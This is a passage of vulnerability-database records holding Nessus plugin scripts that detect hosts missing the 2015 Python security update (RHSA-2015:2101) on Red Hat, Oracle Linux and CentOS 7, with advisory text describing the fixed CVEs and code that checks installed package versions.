Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. 
However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7185\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:50:14", "description": "From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. 
(CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-24T00:00:00", "title": "Oracle Linux 7 : python (ELSA-2015-2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-11-24T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:tkinter", "p-cpe:/a:oracle:linux:python", "p-cpe:/a:oracle:linux:python-libs", "p-cpe:/a:oracle:linux:python-test", "p-cpe:/a:oracle:linux:python-tools", "p-cpe:/a:oracle:linux:python-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:python-debug"], "id": "ORACLELINUX_ELSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# Oracle Linux Security Advisory ELSA-2015-2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87020);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"Oracle Linux 7 : python (ELSA-2015-2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2101 :\n\nUpdated 
python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. 
(CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. 
(BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-test\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:30:23", "description": "Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. 
(CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-02T00:00:00", "title": "CentOS 7 : python (CESA-2015:2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-12-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tkinter", "p-cpe:/a:centos:centos:python-devel", "p-cpe:/a:centos:centos:python", "p-cpe:/a:centos:centos:python-debug", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:python-test", "p-cpe:/a:centos:centos:python-libs", "p-cpe:/a:centos:centos:python-tools"], "id": "CENTOS_RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# CentOS Errata and Security Advisory 2015:2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87129);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"CentOS 7 : python (CESA-2015:2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, 
several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the 